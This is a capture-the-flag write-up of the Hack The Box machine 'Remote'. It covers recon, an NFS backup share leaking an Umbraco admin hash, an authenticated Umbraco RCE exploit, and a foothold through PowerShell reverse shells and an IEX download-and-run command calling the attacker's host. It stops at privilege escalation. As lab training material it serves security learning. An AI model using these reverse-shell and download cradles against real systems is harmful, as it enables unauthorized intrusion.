Hack the Box Remote

7 min readApr 12, 2021

My write-up on HTB’s retired machine “Remote”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Preface

HTB’s “Remote” box just came out March 21 ’20 with the difficulty of 4 out of 10 per user’s ratings. Newly released system always gets pounded, race to get the first blood. At the time of this write-up, 2 hrs and 57 mins for User and 3 hrs and 4 mins for root blood.

Reconnaissance

First, let’s use the nmapAutomator to automate the process of recon/enumeration.

Summary of our nmap scan results:

nmap -T4 -p- 10.10.10.180 -oA 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 07:43 EDT
Nmap scan report for 10.10.10.180
Host is up (0.025s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49680/tcp open  unknownNmap done: 1 IP address (1 host up) scanned in 452.22 seconds

Enumeration

First, started checking 21/tcp and can login anonymously but there’s nothing there.

root@cainta:~/Documents/htb/Remote# ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.

Moved on and started enumerating tcp/80, ‘http://10.10.10.180’

Performed Nikto scan

=========================Starting nikto scan- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.180
+ Target Hostname:    10.10.10.180
+ Target Port:        80
+ Start Time:         2020-06-04 04:32:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server banner has changed from '' to 'Microsoft-IIS/10.0' which may suggest a WAF, load balancer or proxy is in place
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /intranet/: This might be interesting...
+ /umbraco/ping.aspx: Umbraco ping page found
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-06-04 04:38:18 (GMT-4) (320 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedFinished nikto scan=========================

Further digging around ACME, nothing stands out but after our Nikto scan, we found /umbraco/

After spending time exploring around /umbraco/, hit a brick-wall and started moving on. I did remember that we came across ‘nfs’ service, result of our nmap scans.

root@cainta:~/Documents/htb/Remote# showmount -h
Usage: showmount [-adehv]
       [--all] [--directories] [--exports]
       [--no-headers] [--help] [--version] [host]
root@cainta:~/Documents/htb/Remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

Mount /site_backups

root@cainta:~/Documents/htb/Remote# mkdir /tmp/nfs
root@cainta:~/Documents/htb/Remote# mount -t nfs 10.10.10.180:/site_backups /tmp/nfs/ -nolock
root@cainta:~/Documents/htb/Remote#root@cainta:/tmp/nfs# ls -latr
total 123
-rwx------  1 nobody 4294967294    89 Nov  1  2018 Global.asax
-rwx------  1 nobody 4294967294   152 Nov  1  2018 default.aspx
-rwx------  1 nobody 4294967294 28539 Feb 20 00:57 Web.config
drwx------  2 nobody 4294967294    64 Feb 20 12:16 App_Browsers
drwx------  2 nobody 4294967294  4096 Feb 20 12:16 App_Plugins
drwx------  2 nobody 4294967294    64 Feb 20 12:16 aspnet_client
drwx------  2 nobody 4294967294 49152 Feb 20 12:16 bin
drwx------  2 nobody 4294967294    64 Feb 20 12:16 css
drwx------  2 nobody 4294967294  8192 Feb 20 12:16 Config
drwx------  2 nobody 4294967294  4096 Feb 20 12:16 Media
drwx------  2 nobody 4294967294    64 Feb 20 12:16 scripts
drwx------  2 nobody 4294967294  8192 Feb 20 12:16 Umbraco
drwx------  2 nobody 4294967294  4096 Feb 20 12:16 Umbraco_Client
drwx------  2 nobody 4294967294  4096 Feb 20 12:16 Views
drwx------  2 nobody 4294967294  4096 Feb 20 12:17 App_Data
drwx------  2 nobody 4294967294  4096 Feb 23 13:35 .
drwxrwxrwt 20 root   root        4096 Jun  4 06:19 ..
root@cainta:/tmp/nfs#

So much to cover and to check where we could find usernames…..further research on Umbraco, there is a possibility that it can be found in ‘App_Data/Umbraco.sdf’

Tried to open .sdf file but it is not a text file. According to fileinfo.com, an “SDF file contains a compact relational database saved in the SQL Server Compact (SQL CE) format, which is developed by Microsoft. It is designed for applications that run on mobile devices and desktops and contains the complete database contents, which may be up to 4GB in size”.

Used strings and identified ‘admin@htb.local and sha1 hash of ‘b8be16afba8c314ad33d812f22a04991b90e2aaa’

root@cainta:/tmp/nfs/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

Decrypted SHA1 hash

Went back to /umbraco and used the username and password we have, now we got admin access.

Since we have confirmed that our Umbraco version is 7.12.4 and searching for exploits led me to https://github.com/noraj/Umbraco-RC ‘Umbraco CMS 7.12.4 — (Authenticated) Remote Code Execution’

root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfigWindows IP ConfigurationEthernet adapter Ethernet0 2:Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::453a:bc1d:f838:7960
   Link-local IPv6 Address . . . . . : fe80::453a:bc1d:f838:7960%13
   IPv4 Address. . . . . . . . . . . : 10.10.10.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d57%13
                                       10.10.10.2root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c hostname
remoteroot@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool

Initial Foothold

Now that we have determined that we can run commands remotely, first thing that comes to mind is ‘Nishang’s Invoke-PowerShellTcp -Reverse”. However, I could not get it working…

Begged, stole, and borrowed more ps scripts… found this!

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.37',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while
(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetB
ytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.37',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -
ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.L
ength)}Save this as 'reverse.ps1' python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.37:80/reverse.ps1')"Serve via SimpleHTTP serverroot@cainta:~/Documents/htb/Remote/10.10.10.180# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.180 - - [04/Jun/2020 08:36:02] "GET /reverse.ps1 HTTP/1.1" 200 -


Reverse shellroot@cainta:~/Documents/htb/Remote# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.180] 49710

PS C:\windows\system32\inetsrv> cd c:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/20/2020   1:13 AM                ftp_transfer
d-----        2/19/2020   3:11 PM                inetpub
d-----        2/19/2020  11:09 PM                Microsoft
d-----        9/15/2018   3:19 AM                PerfLogs
d-r---        2/23/2020   2:19 PM                Program Files
d-----        2/23/2020   2:19 PM                Program Files (x86)
d-----         6/4/2020   5:47 AM                site_backups
d-r---        2/19/2020   3:12 PM                Users
d-----        2/20/2020  12:52 AM                Windows


PS C:\> cd Users
PS C:\Users> dir

User flag obtained.

PS C:\Users\Public> dirDirectory: C:\Users\PublicMode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/19/2020   3:03 PM                Documents
d-r---         6/4/2020   9:27 AM                Downloads
d-r---        9/15/2018   3:19 AM                Music
d-r---        9/15/2018   3:19 AM                Pictures
d-r---        9/15/2018   3:19 AM                Videos
-ar---         6/4/2020   6:48 AM             34 user.txt

Privilege Escalation

Executed winPEAS.exe and found possible way for priv escalation